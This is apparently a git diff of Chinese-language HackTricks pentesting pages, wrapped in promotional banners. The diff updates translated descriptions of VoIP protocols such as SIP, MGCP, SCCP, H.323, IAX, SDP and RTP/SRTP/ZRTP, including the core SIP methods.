<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

153
network-services-pentesting/pentesting-voip/basic-voip-protocols/README.md
View file

@ -1,26 +1,28 @@
# 基本VoIP协议
# 基本 VoIP 协议
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFT](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
{% endhint %}
### [WhiteIntel](https://whiteintel.io)
<figure><img src="../../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**
[**WhiteIntel**](https://whiteintel.io) 是一个由 **暗网** 驱动的搜索引擎,提供 **免费** 功能以检查公司或其客户是否被 **窃取恶意软件** **入侵**
WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
WhiteIntel 的主要目标是打击由于信息窃取恶意软件导致的账户接管和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
@ -30,7 +32,7 @@ WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫
## 信令协议
### SIP(会话初始协议)
### SIP (会话发起协议)
这是行业标准,更多信息请查看:
@ -38,83 +40,112 @@ WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫
[sip-session-initiation-protocol.md](sip-session-initiation-protocol.md)
{% endcontent-ref %}
### MGCP(媒体网关控制协议)
### MGCP (媒体网关控制协议)
MGCP媒体网关控制协议是在RFC 3435中概述的**信令**和**呼叫** **控制协议**。它在集中式架构中运行,由三个主要组件组成:
MGCP (媒体网关控制协议) 是一种 **信令****呼叫** **控制协议**,在 RFC 3435 中进行了概述。它在集中式架构中运行,主要由三个组件组成:
1. **呼叫代理或媒体网关控制器MGC**MGCP架构中的主网关负责**管理和控制媒体网关**。它处理呼叫设置、修改和终止过程。MGC使用MGCP协议与媒体网关通信。
2. **媒体网关MGs或从属网关**:这些设备在不同网络之间**转换数字媒体流**例如传统的电路交换电话和分组交换IP网络。它们由MGC管理并执行从MGC接收的命令。媒体网关可能包括转码、封装和回声消除等功能。
3. **信令网关SGs**:这些网关负责在不同网络之间**转换信令消息**实现传统电话系统例如SS7和基于IP的网络例如SIP或H.323)之间的无缝通信。信令网关对于互操作性至关重要,确保呼叫控制信息在不同网络之间得到正确传递
1. **呼叫代理或媒体网关控制器 (MGC)**MGCP 架构中的主网关,负责 **管理和控制媒体网关**。它处理呼叫设置、修改和终止过程。MGC 使用 MGCP 协议与媒体网关进行通信。
2. **媒体网关 (MGs) 或从属网关**:这些设备 **在不同网络之间转换数字媒体流**,例如传统的电路交换电话和分组交换 IP 网络。它们由 MGC 管理,并执行从 MGC 接收到的命令。媒体网关可能包括转码、分组和回声消除等功能。
3. **信令网关 (SGs)**:这些网关负责 **在不同网络之间转换信令消息**,使传统电话系统(例如 SS7与基于 IP 的网络(例如 SIP 或 H.323)之间实现无缝通信。信令网关对于互操作性至关重要,确保呼叫控制信息在不同网络之间正确传达
总之MGCP将呼叫控制逻辑集中在呼叫代理中,简化了媒体和信令网关的管理,提供了更好的可扩展性、可靠性和效率,提高了电信网络的性能
总之MGCP 将呼叫控制逻辑集中在呼叫代理中,从而简化了媒体和信令网关的管理,提高了电信网络的可扩展性、可靠性和效率
### SCCPSkinny Client Control Protocol
### SCCP (瘦客户端控制协议)
Skinny Client Control ProtocolSCCP是思科系统拥有的**专有信令和呼叫控制协议**。它主要用于**思科统一通信管理器**以前称为CallManager与思科IP电话或其他思科语音和视频终端之间的通信。
瘦客户端控制协议 (SCCP) 是由思科系统公司拥有的 **专有信令和呼叫控制协议**。它主要 **用于****思科统一通信管理器**(前称 CallManager与思科 IP 电话或其他思科语音和视频终端之间的通信。
SCCP是一种轻量级协议简化了呼叫控制服务器与端点设备之间的通信。它被称为“Skinny”因为它的设计简约与其他VoIP协议如H.323或SIP相比带宽要求较低
SCCP 是一种轻量级协议,简化了呼叫控制服务器与终端设备之间的通信。由于其简约的设计和相较于其他 VoIP 协议(如 H.323 或 SIP减少的带宽需求因此被称为“瘦”
基于SCCP系统的主要组件包括
基于 SCCP系统的主要组件包括:
1. **呼叫控制服务器**这个服务器通常是思科统一通信管理器,负责管理呼叫设置、修改和终止过程,以及其他电话功能,如呼叫转移、呼叫转接和呼叫保持。
2. **SCCP端点**这些设备如IP电话、视频会议设备或其他使用SCCP与呼叫控制服务器通信的思科语音和视频终端。它们向服务器注册,发送和接收信令消息,并遵循呼叫控制服务器提供的指令进行呼叫处理。
3. **网关**:这些设备如语音网关或媒体网关负责在不同网络之间转换媒体流如传统的电路交换电话和分组交换IP网络。它们可能还包括其他功能,如转码或回声消除。
1. **呼叫控制服务器**该服务器通常是思科统一通信管理器,管理呼叫设置、修改和终止过程,以及其他电话功能,如呼叫转移、呼叫转接和呼叫保持。
2. **SCCP 终端**:这些设备如 IP 电话、视频会议单元或其他思科语音和视频终端,使用 SCCP 与呼叫控制服务器进行通信。它们向服务器注册,发送和接收信令消息,并遵循呼叫控制服务器提供的呼叫处理指令
3. **网关**:这些设备,如语音网关或媒体网关,负责在不同网络之间转换媒体流,例如传统的电路交换电话和分组交换 IP 网络。它们还可能包括额外的功能,如转码或回声消除。
SCCP提供了思科呼叫控制服务器和端设备之间简单高效的通信方法。然而,值得注意的是**SCCP是一种专有协议**,这可能限制与非思科系统的互操作性。在这种情况下,其他标准VoIP协议如SIP可能更适合
SCCP 提供了一种简单高效的通信方法,连接思科呼叫控制服务器和端设备。然而,值得注意的是 **SCCP 是一种专有协议**,这可能限制与非思科系统的互操作性。在这种情况下,其他标准 VoIP 协议如 SIP 可能更为合适
### H.323
H.323是用于在基于分组交换网络如基于IP的网络上进行多媒体通信的**一套协议**,包括语音、视频和数据会议。它由**国际电信联盟**ITU-T开发为管理多媒体通信会话提供了全面的框架。
H.323 是一套用于多媒体通信的 **协议**,包括语音、视频和数据会议,通过分组交换网络(如基于 IP 的网络)进行。它由 **国际电信联盟**ITU-T开发提供了管理多媒体通信会话的全面框架。
H.323套件的一些关键组件包括:
H.323 套件的一些关键组件包括:
1. **终端**:这些是支持H.323并能参与多媒体通信会话的端点设备如IP电话、视频会议系统或软件应用程序
2. **网关**这些设备在不同网络之间转换媒体流如传统的电路交换电话和分组交换IP网络实现H.323与其他通信系统之间的互操作性。它们可能还包括其他功能,如转码或回声消除。
3. **网关控制器**这些是H.323网络中提供呼叫控制和管理服务的可选组件。它们执行地址转换、带宽管理和接入控制等功能,有助于管理和优化网络资源。
4. **多点控制单元MCUs**这些设备通过管理和混合来自多个端点的媒体流促进多点会议。MCUs支持视频布局控制、语音激活切换和持续存在等功能使得能够举办具有多个参与者的大规模会议成为可能
1. **终端**:这些是支持 H.323 的端点设备,如 IP 电话、视频会议系统或软件应用程序,可以参与多媒体通信会话
2. **网关**:这些设备在不同网络之间转换媒体流,如传统的电路交换电话和分组交换 IP 网络,实现 H.323 与其他通信系统之间的互操作性。它们还可能包括额外的功能,如转码或回声消除。
3. **网关控制器**:这些是可选组件,在 H.323 网络中提供呼叫控制和管理服务。它们执行地址转换、带宽管理和接入控制等功能,帮助管理和优化网络资源。
4. **多点控制单元 (MCUs)**这些设备通过管理和混合来自多个端点的媒体流来促进多点会议。MCUs 使得视频布局控制、语音激活切换和持续存在等功能成为可能,从而能够举办大规模的多方会议
H.323支持一系列音频和视频编解码器,以及其他补充服务,如呼叫转移、呼叫转接、呼叫保持和呼叫等待。尽管在VoIP的早期阶段被广泛采用但H.323逐渐被更现代、更灵活的协议如**会话初始协议SIP**所取代后者提供更好的互操作性和更容易的实施。然而H.323仍在许多传统系统中使用,并继续得到各种设备供应商的支持。
H.323 支持多种音频和视频编解码器,以及其他补充服务,如呼叫转移、呼叫转接、呼叫保持和呼叫等待。尽管在 VoIP 的早期阶段被广泛采用H.323 已逐渐被更现代和灵活的协议如 **会话发起协议 (SIP)** 所取代后者提供了更好的互操作性和更容易的实现。然而H.323 在许多遗留系统中仍在使用,并继续得到各种设备供应商的支持。
### IAXInter Asterisk eXchange
### IAX (Inter Asterisk eXchange)
IAXInter-Asterisk eXchange是一种主要用于Asterisk PBX私有分支交换服务器与其他VoIP设备之间通信的**信令和呼叫控制协议**。它由Asterisk开源PBX软件的创始人Mark Spencer开发作为SIP和H.323等其他VoIP协议的替代方案。
IAX (Inter-Asterisk eXchange) 是一种 **信令和呼叫控制协议**,主要用于 Asterisk PBX私人分支交换机服务器与其他 VoIP 设备之间的通信。它由 Asterisk 开源 PBX 软件的创建者 Mark Spencer 开发,作为其他 VoIP 协议(如 SIP 和 H.323的替代方案。
IAX以其**简单性、高效性和易实现性**而闻名。IAX的一些关键特点包括:
IAX 以其 **简单、高效和易于实现** 而闻名。IAX 的一些关键特性包括:
1. **单个UDP端口**IAX使用单个UDP端口4569进行信令和媒体流量简化了防火墙和NAT穿越使其更容易在各种网络环境中部署。
2. **二进制协议**:与SIP等基于文本的协议不同IAX是一种二进制协议减少了其带宽消耗并使其更有效地传输信令和媒体数据
3. **干线**IAX支持干线允许多个呼叫组合成单个网络连接减少开销提高带宽利用率。
4. **本地加密**IAX内置支持加密使用RSA进行密钥交换和AES进行媒体加密,提供端点之间的安全通信。
5. **点对点通信**IAX可用于端点之间的直接通信无需中央服务器实现更简单、更高效的呼叫路由。
1. **单个 UDP 端口**IAX 使用单个 UDP 端口4569进行信令和媒体流量简化了防火墙和 NAT 穿越,使其在各种网络环境中更易于部署。
2. **二进制协议**:与基于文本的协议(如 SIP不同IAX 是一种二进制协议,减少了带宽消耗,使其在传输信令和媒体数据时更高效
3. **中继**IAX 支持中继,允许多个呼叫合并为单个网络连接,减少开销并提高带宽利用率。
4. **原生加密**IAX 内置对加密的支持,使用 RSA 进行密钥交换,使用 AES 进行媒体加密,提供端点之间的安全通信。
5. **点对点通信**IAX 可用于端点之间的直接通信,无需中央服务器,从而实现更简单和更高效的呼叫路由。
尽管具有这些优点IAX也存在一些局限性例如其主要关注Asterisk生态系统与更成熟的协议如SIP相比采用程度较低。因此对于在Asterisk环境中工作的人来说IAX为VoIP通信提供了强大高效的解决方案。
## 传输和传输协议
尽管 IAX 有其优点,但也存在一些局限性,例如其主要集中在 Asterisk 生态系统上,与更成熟的协议(如 SIP相比采用程度较低。因此IAX 可能不是与非 Asterisk 系统或设备互操作的最佳选择。然而,对于在 Asterisk 环境中工作的人来说IAX 提供了一种强大而高效的 VoIP 通信解决方案。
### SDP会话描述协议
## 传输与传输协议
SDP会话描述协议是一种用于描述多媒体会话特征如语音、视频或数据会议的**基于文本的格式**通过IP网络传输。它由**互联网工程任务组IETF**开发,定义在**RFC 4566**中。SDP不处理实际的媒体传输或会话建立而是与其他信令协议如**SIP会话初始协议**)一起使用,用于协商和交换有关媒体流及其属性的信息。
### SDP (会话描述协议)
SDP的一些关键元素包括:
SDP (会话描述协议) 是一种 **基于文本的格式**,用于描述多媒体会话的特征,如语音、视频或数据会议,通过 IP 网络进行。它由 **互联网工程任务组 (IETF)** 开发,并在 **RFC 4566** 中定义。SDP 不处理实际的媒体传输或会话建立,而是与其他信令协议(如 **SIP (会话发起协议)**)结合使用,以协商和交换有关媒体流及其属性的信息。
1. **会话信息**SDP描述了多媒体会话的细节包括会话名称、会话描述、开始时间和结束时间。
2. **媒体流**SDP定义了媒体流的特征如媒体类型音频、视频或文本、传输协议如RTP或SRTP和媒体格式如编解码器信息
3. **连接信息**SDP提供有关应发送或接收媒体的网络地址IP地址和端口号的信息。
4. **属性**SDP支持使用属性提供有关会话或媒体流的附加可选信息。属性可用于指定各种功能如加密密钥、带宽要求或媒体控制机制。
SDP 的一些关键元素包括:
SDP通常在以下过程中使用
1. **会话信息**SDP 描述多媒体会话的详细信息,包括会话名称、会话描述、开始时间和结束时间。
2. **媒体流**SDP 定义媒体流的特征,如媒体类型(音频、视频或文本)、传输协议(例如 RTP 或 SRTP和媒体格式例如编解码器信息
3. **连接信息**SDP 提供有关网络地址IP 地址)和媒体应发送或接收的端口号的信息。
4. **属性**SDP 支持使用属性提供有关会话或媒体流的附加可选信息。属性可用于指定各种功能,如加密密钥、带宽要求或媒体控制机制。
1. 发起方创建所提议的多媒体会话的SDP描述包括媒体流及其属性的详细信息。
2. SDP描述发送给接收方通常嵌入在信令协议消息中如SIP或RTSP。
3. 接收方处理SDP描述并根据其能力可能接受、拒绝或修改所提议的会话。
4. 最终的SDP描述作为信令协议消息的一部分发送回发起方完成协商过程。
SDP 通常在以下过程中使用:
SDP的简单性和灵活性使其成为在各种通信系统中描述多媒体会话的广泛采用标准在建立和管理IP网络上的实时多媒体会话中发挥着关键作用。
1. 发起方创建提议的多媒体会话的 SDP 描述,包括媒体流及其属性的详细信息。
2. SDP 描述被发送给接收方,通常嵌入在信令协议消息(如 SIP 或 RTSP中。
3. 接收方处理 SDP 描述,并根据其能力,可能接受、拒绝或修改提议的会话。
4. 最终的 SDP 描述作为信令协议消息的一部分发送回发起方,完成协商过程。
SDP 的简单性和灵活性使其成为各种通信系统中描述多媒体会话的广泛采用标准,在通过 IP 网络建立和管理实时多媒体会话中发挥着关键作用。
### RTP / RTCP / SRTP / ZRTP
1. **RTP实时传输协议**RTP是一种设计用于在IP网络上传输音频、视频数据或其他实时媒体的网络协议。由**IETF**开发,定义在**RFC 3550**中RTP通常与信令协议如SIP和H.323一起使用以实现多媒体通信。RTP提供了媒体流的**同步**、**排序**和**时间戳**机制,有助于确保媒体流的平稳和及时播放。
2. **RTCP实时传输控制协议**RTCP是RTP的伴随协议用于监视服务质量QoS并提供有关媒体流传输的反馈。与RTP在同一**RFC 3550**中定义RTCP**定期在RTP会话的参与者之间交换控制数据包**。它共享诸如丢包、抖动和往返时间等信息,有助于诊断和适应网络条件,提高整体媒体质量。
3. **SRTP(安全实时传输协议)**SRTP是RTP的扩展为媒体流提供**加密**、**消息认证**和**重放保护**,确保敏感音频和视频数据的安全传输。在**RFC 3711**中定义SRTP使用AES等加密算法进行加密使用HMAC-SHA1进行消息认证。SRTP通常与安全信令协议如SIP over TLS结合使用以在多媒体通信中提供端到端安全性。
4. **ZRTPZimmermann实时传输协议**ZRTP是一种提供RTP媒体流**端到端加密**的加密密钥协商协议。由PGP的创始人Phil Zimmermann开发描述在**RFC 6189**中。与SRTP依赖信令协议进行密钥交换不同ZRTP设计为独立于信令协议工作。它使用**Diffie-Hellman密钥交换**在通信双方之间建立共享密钥无需先前信任或公钥基础设施PKI。ZRTP还包括诸如**短认证字符串SAS**等功能,以防止中间人攻击。
1. **RTP (实时传输协议)**RTP 是一种网络协议,旨在通过 IP 网络传输音频和视频数据或其他实时媒体。由 **IETF** 开发,并在 **RFC 3550** 中定义RTP 通常与信令协议(如 SIP 和 H.323一起使用以实现多媒体通信。RTP 提供 **同步**、**排序** 和 **时间戳** 媒体流的机制,帮助确保媒体播放的流畅和及时
2. **RTCP (实时传输控制协议)**RTCP 是 RTP 的伴随协议,用于监控服务质量 (QoS) 并提供有关媒体流传输的反馈。在与 RTP 相同的 **RFC 3550** 中定义RTCP **定期在 RTP 会话的参与者之间交换控制数据包**。它共享诸如丢包、抖动和往返时间等信息,有助于诊断和适应网络条件,提高整体媒体质量。
3. **SRTP (安全实时传输协议)**SRTP 是 RTP 的扩展,提供 **加密**、**消息认证** 和 **重放保护**,确保敏感音频和视频数据的安全传输。在 **RFC 3711** 中定义SRTP 使用 AES 等加密算法进行加密,使用 HMAC-SHA1 进行消息认证。SRTP 通常与安全信令协议(如通过 TLS 的 SIP结合使用以提供多媒体通信的端到端安全性。
4. **ZRTP (Zimmermann 实时传输协议)**ZRTP 是一种加密密钥协商协议,为 RTP 媒体流提供 **端到端加密**。由 PGP 的创建者 Phil Zimmermann 开发ZRTP 在 **RFC 6189** 中进行了描述。与依赖信令协议进行密钥交换的 SRTP 不同ZRTP 旨在独立于信令协议工作。它使用 **Diffie-Hellman 密钥交换** 在通信方之间建立共享秘密,而无需事先信任或公共密钥基础设施 (PKI)。ZRTP 还包括 **短认证字符串 (SAS)** 等功能,以防止中间人攻击。
这些协议在**在IP网络上传输和保护实时多媒体通信**中发挥着重要作用。RTP和RTCP处理实际的媒体传输和质量监控而SRTP和ZRTP确保传输的媒体受到窃听、篡改和重放攻击的保护。
这些协议在 **通过 IP 网络传递和保护实时多媒体通信** 中发挥着重要作用。虽然 RTP 和 RTCP 处理实际的媒体传输和质量监控,但 SRTP 和 ZRTP 确保传输的媒体免受窃听、篡改和重放攻击的保护。
### [WhiteIntel](https://whiteintel.io)
<figure><img src="../../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由 **暗网** 驱动的搜索引擎,提供 **免费** 功能以检查公司或其客户是否被 **窃取恶意软件** **入侵**
WhiteIntel 的主要目标是打击由于信息窃取恶意软件导致的账户接管和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
{% embed url="https://whiteintel.io" %}
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>支持 HackTricks</summary>
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
</details>
{% endhint %}

201
network-services-pentesting/pentesting-voip/basic-voip-protocols/sip-session-initiation-protocol.md
View file

@ -1,89 +1,92 @@
# SIP会话初始协议
# SIP (会话发起协议)
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>Support HackTricks</summary>
支持HackTricks的其他方式
- 如果您想看到您的**公司在HackTricks中被广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
- 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
- **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**上关注**我们。
- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
{% endhint %}
## 基本信息
SIP会话初始协议是一种广泛用于在IP网络上建立、修改和终止多媒体会话包括语音、视频和即时消息的**信令和呼叫控制协议**。由**互联网工程任务组IETF**开发SIP在**RFC 3261**中定义,并已成为VoIP和统一通信的事实标准。
SIP (会话发起协议) 是一种**信令和呼叫控制协议**广泛用于在IP网络上建立、修改和终止多媒体会话包括语音、视频和即时消息。SIP由**互联网工程任务组 (IETF)** 开发,定义在**RFC 3261**中,已成为VoIP和统一通信的事实标准。
SIP的一些关键特包括:
SIP的一些关键特包括:
1. **基于文本的协议**SIP是一种基于文本的协议,使其易于阅读和调试。它基于请求-响应模型类似于HTTP并使用诸如INVITE、ACK、BYE和CANCEL等方法来控制呼叫会话。
2. **可扩展性和灵活性**SIP具有高的可扩展性,可用于小规模部署以及大型企业和运营商级环境。它可以轻松扩展新功能,使其适应各种用例和需求。
3. **互操作性**SIP的广泛采用和标准化确保不同设备、应用程序和服务提供商之间更好的互操作性促进跨各种平台的无缝通信。
4. **模块化设计**SIP与其他协议如**RTP实时传输协议**用于媒体传输和**SDP会话描述协议**用于描述多媒体会话)配合工作。这种模块化设计允许更大的灵活性,并与不同的媒体类型和编解码器兼容
5. **代理和重定向服务器**SIP可以使用代理和重定向服务器来促进呼叫路由并提供高级功能,如呼叫转移、呼叫转接和语音邮件服务。
6. **存在和即时消息**SIP不仅限于语音和视频通信。它还支持存在和即时消息实现各种统一通信应用
1. **基于文本的协议**SIP是基于文本的协议使其易于阅读和调试。它基于请求-响应模型类似于HTTP并使用INVITE、ACK、BYE和CANCEL等方法来控制呼叫会话。
2. **可扩展性和灵活性**SIP具有高的可扩展性,可用于小规模部署以及大型企业和运营商级环境。它可以轻松扩展新功能,使其适应各种用例和需求。
3. **互操作性**SIP的广泛采用和标准化确保不同设备、应用程序和服务提供商之间更好的互操作性,促进了各种平台之间的无缝通信。
4. **模块化设计**SIP与其他协议如**RTP实时传输协议**用于媒体传输和**SDP会话描述协议**用于描述多媒体会话)协同工作。这种模块化设计允许更大的灵活性和与不同媒体类型和编解码器的兼容性
5. **代理和重定向服务器**SIP可以使用代理和重定向服务器来促进呼叫路由并提供呼叫转移、呼叫转接和语音邮件服务等高级功能
6. **状态和即时消息**SIP不仅限于语音和视频通信。它还支持状态和即时消息支持广泛的统一通信应用程序
尽管SIP有许多优点但在处理NAT穿越和防火墙问题时配置和管理SIP可能会复杂。然而,其多功能性、可扩展性和在整个行业广泛支持使其成为VoIP和多媒体通信的热门选择。
尽管SIP有许多优点在配置和管理时可能会很复杂,特别是在处理NAT穿越和防火墙问题时。然而其多功能性、可扩展性和行业广泛支持使其成为VoIP和多媒体通信的热门选择。
### SIP方法
在**RFC 3261**中定义的核心SIP方法包括
1. **INVITE**:用于**启动新会话(呼叫)**或修改现有会话。INVITE方法携带会话描述通常使用SDP以通知接收方有关建议会话的详细信息,如媒体类型、编解码器和传输协议。
2. **ACK**:发送以**确认对INVITE请求的最终响应的接收**。ACK方法通过提供端到端确认来确保INVITE事务的可靠性。
3. **BYE**:用于**终止已建立的会话(呼叫)**。BYE方法由会话中的任一方发送表示他们希望结束通信。
4. **CANCEL**:发送以**取消挂起的INVITE**请求以在建立会话之前中止会话。如果发送方改变主意或接收方没有响应CANCEL方法允许发送方中止INVITE事务。
5. **OPTIONS**:用于**查询SIP服务器或用户代理的功能**。OPTIONS方法可用于请求有关支持的方法、媒体类型或其他扩展的信息,而无需实际建立会话。
6. **REGISTER**用户代理使用REGISTER方法向SIP注册服务器**注册其当前位置**。REGISTER方法有助于维护用户的SIP URI与其当前IP地址之间的最新映射从而实现呼叫路由和传递
1. **INVITE**:用于**发起新会话(呼叫)**或修改现有会话。INVITE方法携带会话描述通常使用SDP以通知接收方有关提议会话的详细信息,例如媒体类型、编解码器和传输协议。
2. **ACK**:发送以**确认收到**对INVITE请求的最终响应。ACK方法通过提供端到端确认来确保INVITE事务的可靠性。
3. **BYE**:用于**终止已建立的会话(呼叫)**。BYE方法由会话中的任一方发送表示他们希望结束通信。
4. **CANCEL**:发送以**取消待处理的INVITE**请求在会话建立之前。CANCEL方法允许发送方在改变主意或接收方没有响应时中止INVITE事务。
5. **OPTIONS**:用于**查询SIP服务器或用户代理的能力**。OPTIONS方法可以发送请求有关支持的方法、媒体类型或其他扩展的信息,而无需实际建立会话。
6. **REGISTER**由用户代理用于**向SIP注册服务器注册其当前位置**。REGISTER方法有助于维护用户的SIP URI与其当前IP地址之间的最新映射从而实现呼叫路由和交付
{% hint style="warning" %}
请注意,要给某人打电话**不需要使用REGISTER**。\
但是,为了执行**INVITE**,呼叫方可能需要**先进行身份验证**,否则将收到**`401 Unauthorized`**响应。
请注意,呼叫某人**不需要使用REGISTER**。\
然而,可能在进行**INVITE**之前,呼叫者需要**进行身份验证**,否则将收到**`401 Unauthorized`**响应。
{% endhint %}
除了这些核心方法外,还有**几种在其他RFC中定义的SIP扩展方法**,例如:
除了这些核心方法外,还有**在其他RFC中定义的几种SIP扩展方法**,例如:
1. **SUBSCRIBE**在RFC 6665中定义SUBSCRIBE方法用于**请求有关特定资源状态的通知**,例如用户的存在或呼叫状态。
2. **NOTIFY**也在RFC 6665中定义NOTIFY方法由服务器发送用于**通知订阅的用户代理**有关受监视资源状态的更改
3. **REFER**在RFC 3515中定义REFER方法用于**请求接收方执行转移或引用第三方**。这通常用于**呼叫转移**场景。
4. **MESSAGE**在RFC 3428中定义MESSAGE方法用于**在SIP用户代理之间发送即时消息**在SIP框架内实现基于文本的通信
5. **UPDATE**在RFC 3311中定义UPDATE方法允许**修改会话而不影响现有对话的状态**。这对于在进行中的呼叫中更新会话参数(如编解码器或媒体类型)很有用。
6. **PUBLISH**在RFC 3903中定义PUBLISH方法由用户代理用于**将事件状态信息发布到服务器**,使其对其他感兴趣的方可用。
1. **SUBSCRIBE**在RFC 6665中定义SUBSCRIBE方法用于**请求有关特定资源状态的通知**,例如用户的状态或呼叫状态。
2. **NOTIFY**同样在RFC 6665中定义NOTIFY方法由服务器发送以**通知订阅的用户代理**有关监视资源状态的变化
3. **REFER**在RFC 3515中定义REFER方法用于**请求接收方执行转接或引用第三方**。这通常用于**呼叫转接**场景。
